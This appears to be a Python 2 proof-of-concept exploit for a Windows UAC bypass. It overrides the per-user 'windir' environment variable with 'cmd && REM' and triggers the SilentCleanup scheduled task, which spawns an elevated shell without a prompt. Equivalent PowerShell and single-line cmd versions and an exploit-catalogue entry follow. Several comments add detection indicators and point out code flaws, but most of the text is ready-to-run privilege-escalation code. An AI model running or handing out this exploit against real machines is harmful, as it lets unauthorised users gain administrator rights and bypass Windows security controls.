Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*- | |
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html | |
''' | |
SilentCleanup has a "Highest" RunLevel, meaning it will elevate the scheduled task to administrator without any prompting.
It also contains environment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe); the environment variables are stored in the HKCU registry hive, which is write-accessible by a user (HKCU\Environment).
We can perform an AlwaysNotify UAC bypass by changing the environment variable 'windir' to our own payload and triggering it through the SilentCleanup scheduled task.
''' | |
from _winreg import *
# Python 2 script: `_winreg` and the `print` statement below do not exist on
# Python 3 (where the module is `winreg`).
#
# Opens the per-user HKCU\Environment key with full access.  No elevation is
# needed for this step because the current user owns this hive -- which is the
# whole point of the technique.  From a detection standpoint, a registry
# value-set event on HKCU\Environment\windir coming from an interactive user
# process is the observable to alert on; `windir` is not something a user
# legitimately overrides.
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
registrykey = OpenKey(HKCU, 'Environment', 0, KEY_ALL_ACCESS)
print "Modifying windir environment variable"
# The value is written without checking whether `windir` already existed under
# HKCU; the cleanup further down deletes it unconditionally, so a pre-existing
# per-user value would be lost rather than restored.
SetValueEx(registrykey, 'windir', 0, REG_SZ, 'cmd && REM') # so our payload will basically be (cmd && REM\system32\cleanmgr.exe) and REM comments out the rest of the line
print "Setting payload"
from ctypes.wintypes import *
from ctypes import *
# use_last_error=True captures GetLastError after each call, but nothing in
# this script ever reads ctypes.get_last_error().
shell32 = WinDLL('shell32' , use_last_error=True)
# kernel32 is loaded but never referenced anywhere in this script.
kernel32 = WinDLL('kernel32', use_last_error=True)
# ANSI char pointer.  The lpFile/lpParameters fields are later assigned
# unicode literals; this relies on ctypes' implicit conversion on Python 2 --
# TODO confirm this works on the target interpreter rather than raising.
LPCTSTR = c_char_p
class ShellExecuteInfo(Structure): # typedef struct _SHELLEXECUTEINFO
    """ctypes mirror of the Win32 SHELLEXECUTEINFO structure used by ShellExecuteEx.

    Field order and widths must match the native layout exactly; the caller is
    responsible for filling ``cbSize`` with ``sizeof(self)`` before the call.
    Fields left at their zero default are legal: with ``fMask`` == 0 the API
    does not hand back a process handle, so ``hProcess`` stays NULL on return.
    """
    _fields_ = [ # {
        ('cbSize', DWORD), # DWORD cbSize;
        ('fMask', ULONG), # ULONG fMask;
        ('hwnd', HWND), # HWND hwnd;
        ('lpVerb', LPCTSTR), # LPCTSTR lpVerb;
        ('lpFile', LPCTSTR), # LPCTSTR lpFile;
        ('lpParameters', LPCTSTR), # LPCTSTR lpParameters;
        ('lpDirectory', LPCTSTR), # LPCTSTR lpDirectory;
        ('nShow', c_int), # int nShow;
        ('hInstApp', HINSTANCE), # HINSTANCE hInstApp;
        ('lpIDList', LPVOID), # LPVOID lpIDList;
        # Bound as LPSTR while the SDK comment says LPCTSTR; both are a char
        # pointer in ctypes.wintypes, so the layout is unaffected.
        ('lpClass', LPSTR), # LPCTSTR lpClass;
        ('hKeyClass', HKEY), # HKEY hkeyClass;
        ('dwHotKey', DWORD), # DWORD dwHotKey;
        # The native union (hIcon / hMonitor) is represented by a single HANDLE,
        # which has the same size, so the following field stays aligned.
        ('hIcon', HANDLE), # union { HANDLE hIcon; HANDLE hMonitor;}
        ('hProcess', HANDLE) # HANDLE hProcess;
    ] # }
PShellExecuteInfo = POINTER(ShellExecuteInfo)
# Plain `ShellExecuteEx` export (not the explicit W variant), consistent with
# the c_char_p-typed fields above -- TODO confirm this resolves to the ANSI
# entry point on the target shell32.
ShellExecuteEx = shell32.ShellExecuteEx
ShellExecuteEx.restype = BOOL
ShellExecuteEx.argtypes = [
    PShellExecuteInfo
]
SW_HIDE = 0  # nShow value: start the launched program without a visible window
ShellExecute = ShellExecuteInfo()
ShellExecute.cbSize = sizeof(ShellExecute)
ShellExecute.lpFile = u'schtasks.exe'
# Non-raw literal: \M, \W, \D and \S are not recognised escapes, so the
# backslashes survive, but an r'...' string would make that explicit.
# Detection note: schtasks.exe /Run of the SilentCleanup task launched by an
# ordinary user process, followed shortly by the Task Scheduler service
# starting cmd.exe instead of cleanmgr.exe, is the process lineage a defender
# can key on; the script itself never becomes the parent of the elevated
# process (presumably -- verify in a lab).
ShellExecute.lpParameters = u'/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I'
ShellExecute.nShow = SW_HIDE
# The BOOL return is discarded and GetLastError is never consulted, so a
# failed launch is indistinguishable from success at this point.
ShellExecuteEx(byref(ShellExecute))
print "Triggering SilentCleanup, should spawn a shell with administrative privileges"
# Fixed one-second wait before cleanup; there is no synchronisation with the
# task actually starting.
import time; time.sleep(1)
# Removes the overridden value unconditionally.  If the script is killed before
# reaching this line the modified HKCU\Environment\windir persists -- a
# leftover value here is itself an indicator worth checking during triage.
DeleteValue(registrykey, 'windir')
CloseKey(registrykey)
''' | |
Windows PowerShell | |
Copyright (C) Microsoft Corporation. All rights reserved. | |
PS C:\Users\uknown> New-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd && REM" | Out-Null | |
PS C:\Users\uknown> Start-Process -FilePath "schtasks.exe" -ArgumentList "/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I" | |
PS C:\Users\uknown> Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" -ErrorAction SilentlyContinue | Out-Nul | |
''' | |
''' | |
Microsoft Windows [Version 10.0.16299.248] | |
(c) 2017 Microsoft Corporation. All rights reserved. | |
C:\Users\uknown>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM " && schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I | |
''' | |
''' | |
34. | |
- Author: James Forshaw | |
- Type: Shell API | |
- Method: Environment variables expansion | |
- Target(s): \system32\svchost.exe via \system32\schtasks.exe | |
- Component(s): Attacker defined | |
- Works from: Windows 8.1 (9600) | |
- AlwaysNotify compatible | |
- Fixed in: unfixed 🙈 | |
- How: - | |
''' |